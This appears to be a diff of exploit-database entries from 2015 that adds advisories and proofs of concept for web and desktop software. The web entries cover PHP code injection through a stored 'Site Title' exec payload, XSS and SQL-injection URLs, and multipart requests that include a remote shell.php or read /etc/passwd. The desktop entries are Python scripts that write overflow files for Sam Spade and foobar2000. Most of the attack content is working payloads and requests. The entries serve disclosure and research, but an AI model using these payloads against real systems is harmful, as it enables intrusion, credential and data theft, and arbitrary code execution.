http://localhost/imagehost1.6.6/admin.php?act=set
2) click on admin menu on left and enter your passwords DO NOT click 'Save
changes' yet! or you get error message to enter creds
3) now go back to settings tab and click 'General' then inject below PHP
code into the 'Site Title' input field
4) now click 'Save Changes', this code will get stored under /inc
directory within the 'set.php' PHP file.
our PHP injection payload needs the single quotes, double back slashes,
semicolons as described below to correctly escape the syntax
so we do not break the PHP page and cause errors, our extra \\ quoutes and
; gets removed after injection takes place.
some examples...
';echo exec("c:\\Windows\\system32\\calc.exe");'';';
'set.php' on line 11 then becomes:
$settings['SET_TITLE'] = '';echo
exec("c:\Windows\system32\calc.exe");'';';';
OR inject CMD to launch chrome.exe etc...
';echo exec("c:\\Program Files
(x86)\\Google\\Chrome\\Application\\chrome.exe");'';';
After, click on some tabs above like 'Database' or 'Ban User' and Tada!
this will execute our stored PHP command...
either running calc.exe or launching Google Chrome.
Disclosure Timeline:
=====================
Vendor Notification: NA
November 13, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local / Remote
Severity Level:
================
High
Description:
================================================================
Request Method(s): [+] POST
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
Vulnerable Parameter(s): [+] 'Site Title', 'Site Slogan' etc..
Affected Area(s): [+] OS
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

47
platforms/php/webapps/38709.txt Executable file
View file

@ -0,0 +1,47 @@
source: http://www.securityfocus.com/bid/61825/info
MCImageManager is prone to multiple security vulnerabilities.
An attacker may exploit these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, manipulate the page and spoof content to misguide users and to disclose or modify sensitive information. Other attacks may also be possible.
MCImageManager 3.1.5 and prior versions are vulnerable.
http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv
http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg
http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg
http://www.example.com/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml
File 1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>
<html>
<body>
<script>
function flvStart() {
alert('XSS');
}
function flvEnd() {
alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flvPlayer.swf">
<param name=quality value=high>
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.example1.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"; type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

13
platforms/php/webapps/38712.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/61880/info
Bo-Blog is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
Bo-Blog 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com//view.php?go=userlist&ordered=1%27 [SQLi]
http://www.example.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E [XSS]
http://www.example.com//view.php?go=userlist&ordered=1&usergroup="/><script>alert(1);</script> [XSS]

218
platforms/php/webapps/38727.txt Executable file
View file

@ -0,0 +1,218 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_17102015
Path Link: http://forum.alegrocart.com/download/file.php?id=1040
Vendor Website: http://alegrocart.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There is a blind SQL injection in the admin area of AlegroCart. Additionally,
there is a blind SQL injection when a customer purchases a product. Because of
a required interaction with PayPal, this injection is hard to exploit for an
attacker.
3. BLind SQL Injection (Admin)
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When viewing the list of uploaded files - or images - , the function
check_download is called. This function performs a database query with the
unsanitized name of the file. Because of this, an attacker can upload a file
containing SQL code in its name, which will be executed once files are listed.
Note that a similar function - check_filename - is called when deleting a file,
making it likely that this operation is vulnerable as well.
Admin credentials are required to exploit this issue.
Proof of Concept
POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16690383031191084421650661794
Content-Length: 865
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="language[1][name]"
test
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="download"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(100000000,ENCODE('MSG','by 5 seconds')),null) -- -"
Content-Type: image/jpeg
img
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="mask"
11953405959037.jpg
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="remaining"
1
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4"
f396df6c76265de943be163e9b65878a
-----------------------------16690383031191084421650661794--
Visiting
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download
will trigger the injected code.
Code
/upload/admin2/model/products/model_admin_download.php
function check_download($filename){
$result = $this->database->getRow("select * from download where filename = '".$filename."'");
return $result;
}
function check_filename($filename){
$results = $this->database->getRows("select filename from download where filename = '" . $filename . "'");
return $results;
}
/upload/admin2/controller/download.php
function checkFiles() {
$files=glob(DIR_DOWNLOAD.'*.*');
if (!$files) { return; }
foreach ($files as $file) {
$pattern='/\.('.implode('|',$this->prohibited_types).')$/';
$filename=basename($file);
if (!preg_match($pattern,$file) && $this->validate->strlen($filename,1,128)) {
$result = $this->modelDownload->check_download($filename);
if (!$result) { $this->init($filename); }
}
}
}
4. BLind SQL Injection (Customer)
CVSS
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is an SQL Injection when using Paypal as a payment method during
checkout.
Please note that this injection requires that a successful interaction with
Paypal took place. For test purposes, we commented out the parts of the code
that actually perform this interaction with Paypal.
Proof of Concept
1. Register a User
2. Buy an item, using PayPal as payment method; stop at step "Checkout Confirmation"
3. Visit this link to trigger the injection: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION. Note that this requires a valid paypal tx token.
The injection can be exploited blind:
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23)
However, this is rather unpractical, especially considering the need for a
valid PayPal token for each request.
It is also possible with this injection to inject into an UPDATE statement in
update_order_status_paidunconfirmed. The problem here is that it is difficult
to create an injection that exploits the UPDATE statement, but also results in
an order_id being returned by the previous SELECT statement.
It may also be possible to use the order_id that can be controlled via the
SELECT statement to inject into the INSERT statement in update_order_history.
But again, it is difficult to craft a query that does this, but also returns a
valid result for the UPDATE query.
Code
/upload/catalog/extension/payment/paypal.php:
function orderUpdate($status = 'final_order_status', $override = 0) {
//Find the paid_unconfirmed status id
$results = $this->getOrderStatusId('order_status_paid_unconfirmed');
$paidUnconfirmedStatusId = $results?$results:0;
//Find the final order status id
$results = $this->getOrderStatusId($status);
$finalStatusId = $results?$results:0;
$reference = $this->request->get('ref');
//Get Order Id
$res = $this->modelPayment->get_order_id($reference);
$order_id = $res['order_id'];
//Update order only if state in paid unconfirmed OR override is set
if ($order_id) {
if ($override) {
// Update order status
$result = $this->modelPayment->update_order_status_override($finalStatusId,$reference);
// Update order_history
if ($result) {
$this->modelPayment->update_order_history($order_id, $finalStatusId, 'override');
}
} else {
// Update order status only if status is currently paid_unconfirmed
$result = $this->modelPayment->update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId);
// Update order_history
if ($result) {
$this->modelPayment->update_order_history($order_id, $finalStatusId, 'PDT/IPN');
}
}
}
}
/upload/catalog/model/payment/model_payment.php:
function get_order_id($reference){
$result = $this->database->getrow("select `order_id` from `order` where `reference` = '" . $reference . "'");
return $result;
}
function update_order_history($order_id, $finalStatusId,$comment){
$this->database->query("insert into `order_history` set `order_id` = '" . $order_id . "', `order_status_id` = '" . $finalStatusId . "', `date_added` = now(), `notify` = '0', `comment` = '" . $comment . "'");
}
function update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId){
$result = $this->database->countAffected($this->database->query("update `order` set `order_status_id` = '" . $finalStatusId . "' where `reference` = '" . $reference . "' and order_status_id = '" . $paidUnconfirmedStatusId . "'"));
return $result;
}
5. Solution
To mitigate this issue please apply this patch:
http://forum.alegrocart.com/download/file.php?id=1040
Please note that a newer version might already be available.
6. Report Timeline
09/29/2015 Informed Vendor about Issue
17/10/2015 Vendor releases fix
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-SQL-Injection-104.html

129
platforms/php/webapps/38728.txt Executable file
View file

@ -0,0 +1,129 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_22102015
Path Link: http://forum.alegrocart.com/download/file.php?id=1047
Vendor Website: http://alegrocart.com/
Vulnerability Type: LFI/RFI
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When retrieving logs, there are no checks on the given file_path Parameter.
Because of this, local or remote files can be included, which are then executed
or printed.
Admin credentials are required to view logs.
3. Proof of Concept
Remote File:
POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222
Content-Length: 441
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="directory"
error_log
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="file_path"
http://localhost/shell.php
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"
0
-----------------------------16809437203643590021165278222--
Local File:
POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222
Content-Length: 425
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="directory"
error_log
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="file_path"
/etc/passwd
-----------------------------16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"
0
-----------------------------16809437203643590021165278222--
For the patches AC128_fix_13102015 and AC128_fix_17102015 the following attack
strings were still working:
http://localhost/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/
/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/../../../../../../../etc/passwd
4. Code
/ upload/admin2/controller/report_logs.php
function get_file(){
$file = '';
if($this->request->gethtml('file_path', 'post')){
$file = file_get_contents($this->request->gethtml('file_path', 'post'));
}
if($this->request->gethtml('decrytion', 'post')){
$file = $this->ccvalidation->deCrypt($file, $this->config->get('config_token'));
}
if($file){
$file = str_replace(array("\r\n", "\r", "\n"),'<br>', $file);
}
return $file;
}
5. Solution
To mitigate this issue please apply this patch:
TODO
Please note that a newer version might already be available.
6.. Report Timeline
09/29/2015 Informed Vendor about Issue
11/03/2015 Vendor releases fix
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-LFIRFI-102.html

133
platforms/php/webapps/38729.txt Executable file
View file

@ -0,0 +1,133 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0.
An account with the role "Publisher" or "Administrator" is needed to exploit
each of these vulnerabilities.
3. SQL Injection 1 (Blind)
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
The id parameter of the web user editor is vulnerable to blind SQL Injection.
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
Proof of Concept
http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23
-> true
http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23
-> false
Code
/manager/actions/mutate_web_user.dynamic.php
$sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where webuser=".$_GET['id']."";
4. SQL Injection 2
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When updating a user, the newusername parameter is vulnerable to SQL injection.
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
Proof of Concept
POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest
&newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- -
&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query
Code
/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('manager_users') . "
SET username='$newusername'" . $updatepasswordsql . "
WHERE id=$id";
5. SQL Injection 3
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When updating a user, the country, role, blocked, blockeduntil, blockedafter,
failedlogincount, and gender parameter are vulnerable to SQL injection.
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
Proof of Concept
The proof of concepts for the country, role, blocked, blockeduntil,
failedlogincount, and blockedafter parameter are analog to this POC for gender:
POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=
&gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0
&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query
Visiting the overview page of that user will show the result of the injected
query.
Code
/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('user_attributes') . "
SET fullname='$fullname', role='$roleid', email='$email', phone='$phone',
mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state',
country='$country', gender='$gender', dob='$dob', photo='$photo', comment='$comment',
failedlogincount='$failedlogincount', blocked=$blocked, blockeduntil=$blockeduntil,
blockedafter=$blockedafter
WHERE internalKey=$id";
6. Solution
This issue has not been fixed by the vendor.
7. Report Timeline
10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-SQL-Injection-99.html

51
platforms/windows/dos/38701.txt Executable file
View file

@ -0,0 +1,51 @@
# TECO SG2 FBD Client 3.51 SEH Overwrite Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 3.51 and 3.40
#
# Summary: SG2 Client is a program that enables to create and edit applications.
# The program is providing two edit modes, LADDER and FBD to rapidly and directly
# input the required app. The Simulation Mode allows users to virtually run and test
# the program before it is loaded to the controller.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a Genie FBD, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .GFB file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (fb0.fd0): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\SG2 Client\FBD.EXE
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\SG2 Client\FBD.EXE
# eax=4141413f ebx=00000004 ecx=41414141 edx=41414141 esi=0018f578 edi=00a642e8
# eip=00440b57 esp=0018ef9c ebp=0000003f iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
# FBD+0x40b57:
# 00440b57 8995a0000000 mov dword ptr [ebp+0A0h],edx ss:002b:000000df=????????
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5276
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5276.php
#
#
# 09.10.2015
#
PoC:
- http://zeroscience.mk/codes/sg2fbd-5276.zip
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38701.zip

48
platforms/windows/dos/38702.txt Executable file
View file

@ -0,0 +1,48 @@
# TECO TP3-PCLINK 2.1 TPC File Handling Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Affected version: 2.1
#
# Summary: TP3-PCLINK Software is the supportive software for TP03, providing
# three edit modes as LADDER, IL ,FBDand SFC, by which programs can be input
# rapidly and correctly.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a project file, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .TPC file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (794.193c): C++ EH exception - code e06d7363 (first chance)
# Critical error detected c0000374
# (794.193c): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=778f0b42 edx=0018db71 esi=02730000 edi=41414141
# eip=7794e725 esp=0018ddc4 ebp=0018de3c iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
# ntdll!RtlpNtEnumerateSubKey+0x1af8:
# 7794e725 cc int 3
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5277
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5277.php
#
#
# 09.10.2015
#
PoC:
- http://zeroscience.mk/codes/tp3tpc-5277.zip
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38702.zip

48
platforms/windows/dos/38703.txt Executable file
View file

@ -0,0 +1,48 @@
# TECO AP-PCLINK 1.094 TPC File Handling Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 1.094
#
# Summary: AP-PCLINK is the supportive software for TP03 or AP series, providing
# three edit modes as LADDER, IL, FBDand SFC, by which programs can be input rapidly
# and correctly. Every form written into the TP03 or AP series and AP-PCLINK can
# be monitored in the form of the data.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a project file, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .TPC file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# Critical error detected c0000374
# (1950.ff0): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=76f70b42 edx=0018d98d esi=00360000 edi=41414141
# eip=76fce725 esp=0018dbe0 ebp=0018dc58 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
# ntdll!RtlpNtEnumerateSubKey+0x1af8:
# 76fce725 cc int 3
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5278
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5278.php
#
#
# 09.10.2015
#
PoC:
- http://zeroscience.mk/codes/aptpc-5278.zip
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38703.zip

35
platforms/windows/dos/38705.py Executable file
View file

@ -0,0 +1,35 @@
#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Browse URL Buffer Overflow PoC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 14/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Eip Overwrite
# Tested on OS : Windows 7 Home Basic
# Crash Point : Go to Tools > Browse Web> Enter the contents of 'sam_spade_browse_url.txt' > OK , Note: Do #Not Remove the http://
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# And the Stack
#0012F73C 41414141 AAAA
#0012F740 41414141 AAAA
#0012F744 DEADBEAF ¯¾­Þ
# Registers
#EAX 00000001
#ECX 00000001
#EDX 00000030
#EBX 00000000
#ESP 0012F74C
#EBP 41414141
#ESI 008DA260
#EDI 0176F4E0
#EIP DEADBEAF
f = open("sam_spade_browse_url.txt", "w")
Junk = "A"* 496
eip_overwrite = "\xaf\xbe\xad\xde"
f.write(Junk+eip_overwrite)
f.close()

27
platforms/windows/dos/38710.py Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: foobar2000 1.3.9 (.pls; .m3u; .m3u8) Local Crash PoC
# Date: 11-15-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
# Version: 1.3.9
# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64
import os
evil = '\x41' * 256
pls = '[playlist]\n' + 'NumberOfEntries=1\n' +'File1=http://' + evil + '\n' + 'Title1=\n' + 'Length1=-1\n'
m3u = 'http://' + evil
m3u8 = 'http://' + evil
file = open('Local_Crash_PoC.pls', 'wb')
file.write(pls)
file.close()
file = open('Local_Crash_PoC.m3u', 'wb')
file.write(m3u)
file.close()
file = open('Local_Crash_PoC.m3u8', 'wb')
file.write(m3u8)
file.close()

40
platforms/windows/dos/38711.py Executable file
View file

@ -0,0 +1,40 @@
# Exploit Title: foobar2000 1.3.9 (.asx) Local Crash PoC
# Date: 11-15-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://www.foobar2000.org/
# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
# Version: 1.3.9
# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64
# Instructions: Create playlist.asx:
# <asx version="3.0">
# <title>Example.com Live Stream</title>
#
# <entry>
# <title>Short Announcement to Play Before Main Stream</title>
# <ref href="http://example.com/announcement.wma" />
# <param name="aParameterName" value="aParameterValue" />
# </entry>
#
# <entry>
# <title>Example radio</title>
# <ref href="http://example.com" />
# <author>Example.com</author>
# <copyright>example.com</copyright>
# </entry>
# </asx>
import os
import shutil
evil = 'A' * 256
shutil.copy ('playlist.asx', 'Local_Crash_PoC.asx')
file = open('Local_Crash_PoC.asx','r')
file_data = file.read()
file.close()
file_new_data = file_data.replace('<ref href="http://example.com" />','<ref href="http://' + evil + '" />')
file = open('Local_Crash_PoC.asx','w')
file.write(file_new_data)
file.close()

87
platforms/windows/dos/38713.txt Executable file
View file

@ -0,0 +1,87 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=507
We have observed a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files. An example of a crash log excerpt generated after triggering the bug is shown below:
---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fffff900c49ab000, memory referenced
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation
Arg3: fffff96000324c14, if non-zero, the address which referenced memory.
Arg4: 0000000000000000, (reserved)
[...]
FAULTING_IP:
win32k!or_all_N_wide_rotated_need_last+70
fffff960`00324c14 410802 or byte ptr [r10],al
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0xD6
CURRENT_IRQL: 0
TRAP_FRAME: fffff88007531690 -- (.trap 0xfffff88007531690)
.trap 0xfffff88007531690
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff880075318ff rbx=0000000000000000 rcx=0000000000000007
rdx=00000000000000ff rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000324c14 rsp=fffff88007531820 rbp=fffffffffffffff5
r8=00000000ffffffff r9=fffff900c1b48995 r10=fffff900c49ab000
r11=0000000000000007 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
win32k!or_all_N_wide_rotated_need_last+0x70:
fffff960`00324c14 410802 or byte ptr [r10],al ds:0b08:fffff900`c49ab000=??
.trap
Resetting default scope
LAST_CONTROL_TRANSFER: from fffff8000294a017 to fffff800028cd5c0
STACK_TEXT:
fffff880`07531528 fffff800`0294a017 : 00000000`00000050 fffff900`c49ab000 00000000`00000001 fffff880`07531690 : nt!KeBugCheckEx
